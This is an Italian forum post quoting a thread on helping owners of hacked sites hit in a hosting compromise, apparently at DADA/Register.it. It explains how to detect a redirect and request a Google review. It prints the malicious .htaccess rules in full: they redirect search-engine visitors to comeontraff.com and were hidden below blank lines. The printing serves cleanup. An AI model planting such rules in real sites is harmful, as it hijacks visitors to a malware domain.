Discussione: Colpa della FANI ?
Visualizza messaggio singolo
Vecchio 19 dicembre 09, 11:00   #9 (permalink)  Top
Highly Flammable
Sospeso
 
Data registr.: 09-07-2009
Messaggi: 187
Citazione:
Originalmente inviato da SlowFlyer Visualizza messaggio
Probabilmente l'algoritmo di Google ogni tanto sbaglia
È improbabile.

[Is infected my site or my hosting provider? - BadwareBusters]

Citazione:
by redleg about 20 hours ago

This hack has been very pervasive, has hit many servers and individual sites. In most cases the hosting service has cleaned up the problem but some individual sites are still infected.

First check to see if your site remains infected. You can use a tool that shows redirects like Rex Swain at Rex Swain's HTTP Viewer

Enter your URL and be sure to enter Google in the box labeled
Referer (optional)

If your site is still infected in the results you will see the page redirected to the malicious site comeontraff.com

If your site is not redirected go ahead and submit a request for review with Google. To remove a malware warning you must “Request a Review” in the Google Webmaster Tools Account for the site. Google Webmaster Tools can be accessed at this link

https://www.google.com/webmasters/tools/

If you do not all ready have a WMT account for the site you can create one

Access Google WMT at the link above
Then click the Add the site to Google Webmaster Tools button
Follow the directions to Verify ownership of the site

Once you have an account and verified ownership of the site

Click the link for the site which will take you to the Dashboard for the site
Click the link [ More Details ] from the red malware warning bar
Click the link “Request a Review” and submit the requested information.

Ref
FAQ: Malware and hacked sites (Google Webmaster Help)

If your site does redirect you need to check a file named .htaccess for suspicious redirects. Todate all of the infected sites have found the following code in their .htaccess file

RewriteEngine On
RewriteCond %{HTTP_COOKIE} !^.psessid=234845.$
RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .aol.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .msn.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .altavista.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .ask.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .yahoo.$ [NC]
RewriteCond %{HTTP_USERAGENT} .Windows.$ [NC]
RewriteRule .* http:// comeontraff . com / go.php?sid=9 [R,L,CO=psessid:234845:%{HTTPHOST}:86400]

In most cases the hacker has inserted 100s of blank lines after any legitimate content in the file then inserted the hack lines. Be sure that you have scrolled down to the very bottom of the file. Once you have removed the redirect you will also need to follow the instructions above to remove the malware warning.

Good Luck

Citazione:
by Kaleh about 19 hours ago

It was not a Google False Positive … these sites were clearly showing redirects yesterday.

It is possible for the hosting provider to fix such a problem without admitting that the problem existed.

Citazione:
by Frankie about 6 hours ago

Today everything seems back to normal…

The Italian provider DADA has probably been hacked 2 days ago (as it had a down of around 10 minutes) and the support staff kept telling people that the provider was totally OK and that the culprit were the PCs of the owner of the websites have been infected… funny that the support staff dind’t even tell people to verify their DBs…

Now, I wonder if DADA/Register.it will ever tell us what really happened and if they really solved their vulnerabilities…

Shouldn’t they be legally liable for telling a lie to us and not helping us to solve a situation that they were responsible and that caused us loosing tens of thousands of visitors?

Anyway my suggestions is: DO NOT USE DADA or REGISTER.IT hosting till they explain us what happened and what they have done to solve the problem!!
Highly Flammable non è collegato   Rispondi citando